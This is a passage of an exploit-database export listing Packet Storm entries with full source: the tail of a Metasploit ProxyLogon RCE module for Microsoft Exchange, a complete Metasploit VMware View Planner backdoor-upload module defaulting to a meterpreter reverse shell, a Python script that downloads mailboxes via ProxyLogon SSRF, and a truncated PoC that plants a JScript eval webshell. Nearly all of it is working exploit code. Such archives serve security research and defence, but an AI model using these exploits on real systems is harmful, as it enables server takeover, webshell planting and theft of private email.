\ninput_name = install_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t prepare the payload on the remote target') if input_name.empty? \n \n# reset the virtual directory (and write the payload). \nprint_status('Write the payload on the remote target') \nremote_file = write_payload(session_info) \n \nfail_with(Failure::NoAccess, 'Could\\'t write the payload on the remote target') if remote_file.empty? \n \n# wait a lot. \ni = 0 \nwhile i < datastore['MaxWaitLoop'] \nreceived = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(web_directory, remote_file) \n}) \nif received && (received.code == 200) \nbreak \nend \n \nprint_warning(\"Wait a lot (#{i})\") \nsleep 5 \ni += 1 \nend \nfail_with(Failure::PayloadFailed, 'Could\\'t take the remote backdoor (see. ExchangePathBase option)') if received.code == 302 \n \n[input_name, remote_file] \nend \n \ndef search_oab(server_name, sid) \n# request cookies (session and canary) \nprint_status(message('Sending ProxyLogon request')) \n \nprint_status('Try to get a good msExchCanary (by patching user SID method)') \nsession_id, canary = request_proxylogon(server_name, patch_sid(sid)) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \n \nif oab_id.nil? || oab_id.empty? \nprint_status('Try to get a good msExchCanary (without correcting the user SID)') \nsession_id, canary = request_proxylogon(server_name, sid) \nif canary \nsession = \"ASP.NET_SessionId=#{session_id}; msExchEcpCanary=#{canary};\" \noab_id = request_oab(server_name, sid, session, canary) \nend \nend \n \nfail_with(Failure::NotFound, 'No \\'ASP.NET_SessionId\\' was found') if session_id.nil? || session_id.empty? \nfail_with(Failure::NotFound, 'No \\'msExchEcpCanary\\' was found') if canary.nil? || canary.empty? \nfail_with(Failure::NotFound, 'No \\'OAB Id\\' was found') if oab_id.nil? || oab_id.empty? \n \nprint_status(\"ASP.NET_SessionId: #{session_id}\") \nprint_status(\"msExchEcpCanary: #{canary}\") \nprint_status(\"OAB id: #{oab_id[1]} (#{oab_id[0]})\") \n \nreturn [sid, session, canary, oab_id] \nend \n \ndef send_http(method, ssrf, opts = {}) \nssrf = \"X-BEResource=#{ssrf};\" \nif opts[:cookie] && !opts[:cookie].empty? \nopts[:cookie] = \"#{ssrf} #{opts[:cookie]}\" \nelse \nopts[:cookie] = ssrf.to_s \nend \n \nopts[:ctype] = 'application/x-www-form-urlencoded' if opts[:ctype].nil? \n \nrequest = { \n'method' => method, \n'uri' => @random_uri, \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype] \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL']}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \nweb_dir = datastore['IISWritePath'].gsub('\\\\', '/') \nelse \nweb_dir = datastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nweb_dir \nend \n \ndef write_payload(exploit_info) \n# exploit_info: [server_name, sid, session, canary, oab_id] \n \nremote_file = \"#{rand_text_alpha(4..8)}.aspx\" \nif datastore['UseAlternatePath'] \nremote_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['IISBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nelse \nremote_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nremote_path = \"\\\\\\\\127.0.0.1\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{remote_path}\\\\#{remote_file}\" \nend \n \ndata = { \nidentity: { \n__type: 'Identity:ECP', \nDisplayName: (exploit_info[4][0]).to_s, \nRawIdentity: (exploit_info[4][1]).to_s \n}, \nproperties: { \nParameters: { \n__type: 'JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel', \nFilePathName: remote_path.to_s \n} \n} \n}.to_json \n \nresponse = send_http( \n'POST', \n\"Admin@#{exploit_info[0]}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=#{exploit_info[3]}&a=~#{random_ssrf_id}\", \ndata: data, \ncookie: exploit_info[2], \nctype: 'application/json; charset=utf-8', \nheaders: { \n'msExchLogonMailbox' => patch_sid(exploit_info[1]), \n'msExchTargetMailbox' => patch_sid(exploit_info[1]), \n'X-vDirObjectId' => (exploit_info[4][1]).to_s \n} \n) \nreturn '' if response.code != 200 \n \nremote_file \nend \n \ndef exploit \n@proto = (ssl ? 'https' : 'http') \n@random_uri = normalize_uri('ecp', \"#{rand_text_alpha(1..3)}.js\") \n \nprint_status(message('Attempt to exploit for CVE-2021-26855')) \nexploit_info = run_cve_2021_26855 \n \nprint_status(message('Attempt to exploit for CVE-2021-27065')) \nshell_info = run_cve_2021_27065(exploit_info) \n \n@random_inputname = shell_info[0] \n@random_filename = shell_info[1] \n \nprint_good(\"Yeeting #{datastore['PAYLOAD']} payload at #{peer}\") \nif datastore['UseAlternatePath'] \nremote_file = \"#{datastore['IISBasePath']}\\\\#{datastore['IISWritePath']}\\\\#{@random_filename}\" \nelse \nremote_file = \"#{datastore['ExchangeBasePath']}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\\\\#{@random_filename}\" \nend \nregister_files_for_cleanup(remote_file) \n \n# trigger powa! \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nresponse = execute_command(\"cmd /c #{payload.encoded}\") \n \nprint_warning('Dumping command output in response') \noutput = response.body.split('Name :')[0] \nif output.empty? \nprint_error('Empty response, no command output') \nreturn \nend \nprint_line(output) \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161938/exchange_proxylogon_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-19T17:09:26", "description": "", "cvss3": {}, "published": "2021-03-19T00:00:00", "type": "packetstorm", "title": "VMware View Planner 4.6 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-21978"], "modified": "2021-03-19T00:00:00", "id": "PACKETSTORM:161879", "href": "https://packetstormsecurity.com/files/161879/VMware-View-Planner-4.6-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware View Planner Unauthenticated Log File Upload RCE', \n'Description' => %q{ \nThis module exploits an unauthenticated log file upload within the \nlog_upload_wsgi.py file of VMWare View Planner 4.6 prior to 4.6 \nSecurity Patch 1. \n \nSuccessful exploitation will result in RCE as the apache user inside \nthe appacheServer Docker container. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu', # Analysis and PoC \n'Grant Willcox' # Metasploit Module \n], \n'References' => [ \n['CVE', '2021-21978'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0003.html'], \n['URL', 'https://attackerkb.com/assessments/fc456e03-adf5-409a-955a-8a4fb7e79ece'] # wvu's PoC \n], \n'DisclosureDate' => '2021-03-02', # Vendor advisory \n'License' => MSF_LICENSE, \n'Privileged' => false, \n'Platform' => 'python', \n'Targets' => [ \n[ \n'VMware View Planner 4.6.0', \n{ \n'Arch' => ARCH_PYTHON, \n'Type' => :linux_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'python/meterpreter/reverse_tcp' \n} \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'wsgi_log_upload', 'log_upload_wsgi.py') \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nunless res.code == 200 && !res.body.empty? \nreturn CheckCode::Safe('log_upload_wsgi.py file not found at the expected location.') \nend \n \n@original_content = res.body # If the server responded with the contents of log_upload_wsgi.py, lets save this for later restoration. \n \nif res.body&.include?('import hashlib') && res.body&.include?('if hashlib.sha256(password.value.encode(\"utf8\")).hexdigest()==secret_key:') \nreturn CheckCode::Safe(\"Target's log_upload_wsgi.py file has been patched.\") \nend \n \nCheckCode::Appears('Vulnerable log_upload_wsgi.py file identified!') \nend \n \n# We need to upload a file twice: once for uploading the backdoor, and once for restoring the original file. \n# As the code for both is the same, minus the content of the file, this is a generic function to handle that. \ndef upload_file(content) \nmime = Rex::MIME::Message.new \nmime.add_part(content, 'application/octet-stream', nil, \"form-data; name=\\\"logfile\\\"; filename=\\\"#{Rex::Text.rand_text_alpha(20)}\\\"\") \nmime.add_part('{\"itrLogPath\":\"/etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\"}', nil, nil, 'form-data; name=\"logMetaData\"') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'logupload'), \n'ctype' => \"multipart/form-data; boundary=#{mime.bound}\", \n'data' => mime.to_s \n) \nunless res.to_s.include?('File uploaded successfully.') \nfail_with(Failure::UnexpectedReply, \"Target indicated that the file wasn't uploaded successfully!\") \nend \nend \n \ndef exploit \n# Here we want to grab our template file, taken from a clean install but \n# with a backdoor section added to it, and then fill in the PAYLOAD placeholder \n# with the payload we want to execute. \ndata_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \nfile_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) \n \npayload.encoded.gsub!(/\"/, '\\\\\"') \nfile_content['PAYLOAD'] = payload.encoded \n \n# Now that things are primed, upload the file to the target. \nprint_status('Uploading backdoor to system via the arbitrary file upload vulnerability!') \nupload_file(file_content) \nprint_good('Backdoor uploaded!') \n \n# Use the OPTIONS request to trigger the backdoor. Technically this \n# could be any other method including invalid ones like BACKDOOR, but for \n# the purposes of stealth lets use a legitimate one. \nprint_status('Sending request to execute the backdoor!') \nsend_request_cgi( \n'method' => 'OPTIONS', \n'uri' => normalize_uri(target_uri.path, 'logupload') \n) \nensure \n# At this point we should have our shell after waiting a few seconds, \n# so lets now restore the original file so we don't leave anything behind. \nprint_status('Reuploading the original code to remove the backdoor!') \nupload_file(@original_content) \nprint_good('Original file restored, enjoy the shell!') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161879/vmware_view_planner_4_6_uploadlog_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-18T15:56:31", "description": "", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "PACKETSTORM:162610", "href": "https://packetstormsecurity.com/files/162610/Microsoft-Exchange-2019-Unauthenticated-Email-Download.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download \n# Date: 03-11-2021 \n# Exploit Author: Gonzalo Villegas a.k.a Cl34r \n# Vendor Homepage: https://www.microsoft.com/ \n# Version: OWA Exchange 2013 - 2019 \n# Tested on: OWA 2016 \n# CVE : CVE-2021-26855 \n# Details: checking users mailboxes and automated downloads of emails \n \nimport requests \nimport argparse \nimport time \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \n__proxies__ = {\"http\": \"http://127.0.0.1:8080\", \n\"https\": \"https://127.0.0.1:8080\"} # for debug on proxy \n \n \n# needs to specifies mailbox, will return folder Id if account exists \npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\"> \n<t:Mailbox> \n<t:EmailAddress>{}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \n \n\"\"\" \n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) \npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:FindItem Traversal=\"Shallow\"> \n<m:ItemShape> \n<BaseShape>AllProperties</BaseShape></m:ItemShape> \n<SortOrder/> \n<m:ParentFolderIds> \n<t:FolderId Id=\"{}\" ChangeKey=\"{}\"/> \n</m:ParentFolderIds> \n<QueryString/> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox \npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" Traversal=\"Shallow\"> \n<ItemShape> \n<t:BaseShape>Default</t:BaseShape> \n</ItemShape> \n<ItemIds> \n<t:ItemId Id=\"{}\" ChangeKey=\"{}\"/> \n</ItemIds> \n</GetItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n \ndef getFQDN(url): \nprint(\"[*] Getting FQDN from headers\") \nrs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\") \nif \"X-FEServer\" in rs.headers: \nreturn rs.headers[\"X-FEServer\"] \nelse: \nprint(\"[-] Can't get FQDN \") \nexit(0) \n \n \ndef extractEmail(url, uri, user, fqdn, content_folderid, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla pwner\"} \nfrom xml.etree import ElementTree as ET \ndom = ET.fromstring(content_folderid) \nfor p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): \nid_folder = p[0].attrib.get(\"Id\") \nchange_key_folder = p[0].attrib.get(\"ChangeKey\") \ndata = payload_get_items_id_folder.format(id_folder, change_key_folder) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, dowloading email\") \nbreak \nprint(\"[+]Getting mails...\") \ndom_messages = ET.fromstring(rs.text) \nmessages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') \nfor m in messages: \nid_message = m[0].attrib.get(\"Id\") \nchange_key_message = m[0].attrib.get(\"ChangeKey\") \ndata = payload_get_mail.format(id_message, change_key_message) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, downloading email\") \nbreak \n \ntry: \nf = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+') \nf.write(rs.text) \nf.close() \nexcept Exception as e: \nprint(\"[!] Can't write .xml file to path (email): \", e) \n \n \ndef checkURI(url, fqdn): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \narr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"] \nfor uri in arr_uri: \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"), \nheaders=headers) \n#print(rs.content) \nif rs.status_code == 200 and \"MessageText\" in rs.text: \nprint(\"[+] Valid URI:\", uri) \ncalculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\") \nif calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"): \ncalculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1] \nelse: \ncalculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1] \nreturn uri, calculated_domain \n#time.sleep(1) \nprint(\"[-] No valid URI found ;(\") \nexit(0) \n \n \ndef checkEmailBoxes(url, uri, user, fqdn, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), \nheaders=headers) \n#time.sleep(1) \n#print(rs.content) \nif \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user)) \nif \"ResponseCode\" in rs.text and \"NoError\" in rs.text: \nprint(\"[+] Valid Email Found!: {}\".format(user)) \nextractEmail(url, uri, user, fqdn, rs.text, path) \nif \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text: \nprint(\"[-] Not Valid Email: {}\".format(user)) \n \n \ndef main(): \n__URL__ = None \n__FQDN__ = None \n__mailbox_domain__ = None \n__path__ = None \nprint(\"[***** OhhWAA *****]\") \nparser = argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\") \nparser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True) \nparser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True) \nparser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True) \nparser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None) \nparser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None) \nargs = parser.parse_args() \n__URL__ = args.url \n__FQDN__ = args.fqdn \n__mailbox_domain__ = args.domain \n__list_users__ = args.list \n__valid_users__ = [] \n__path__ = args.path \nif not __FQDN__: \n__FQDN__ = getFQDN(__URL__) \nprint(\"[+] Got FQDN:\", __FQDN__) \n \nvalid_uri, calculated_domain = checkURI(__URL__, __FQDN__) \n \nif not __mailbox_domain__: \n__mailbox_domain__ = calculated_domain \n \nlist_users = open(__list_users__, \"r\") \nfor user in list_users: \ncheckEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__) \n \nprint(\"[!!!] FINISHED OhhWAA\") \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162610/msexchange2019-disclose.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:17:14", "description": "", "cvss3": {}, "published": "2021-03-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 SSRF / Arbitrary File Write ", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T00:00:00", "id": "PACKETSTORM:161846", "href": "https://packetstormsecurity.com/files/161846/Microsoft-Exchange-2019-SSRF-Arbitrary-File-Write.html", "sourceData": "`import requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py <target> <email>\") \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py mail.btwaf.cn test2@btwaf.cn\") \nexit() \n \nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"} \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(4) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\test11.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \n# webshell-\u9a6c\u5b50\u5185\u5bb9 \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>' \n \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"\u6b63\u5728\u83b7\u53d6Exchange Server \" + target+\"\u6743\u9650\") \nprint(\"=============================\") \nFQDN = \"EXCHANGE01\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False,proxies=proxies) \n \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nproxies=proxies, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(ct.status_code) \nprint(\"Autodiscover Error!\") \nexit() \n \nif \"<LegacyDN>\" not in str(ct.content): \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = str(ct.content).split(\"<LegacyDN>\")[1].split(r\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"X-Requesttype\": \"Connect\", \n\"X-Clientinfo\": \"{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}\", \n\"X-Clientapplication\": \"Outlook/15.0.4815.1002\", \n\"X-Requestid\": \"{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False, \nproxies=proxies \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in str(ct.content): \nprint(\"Mapi Error!\") \nexit() \n \nsid = str(ct.content).split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \nsid = sid.replace(sid.split(\"-\")[-1],\"500\") \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nproxies=proxies, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; \", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = str(ct.content).split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": 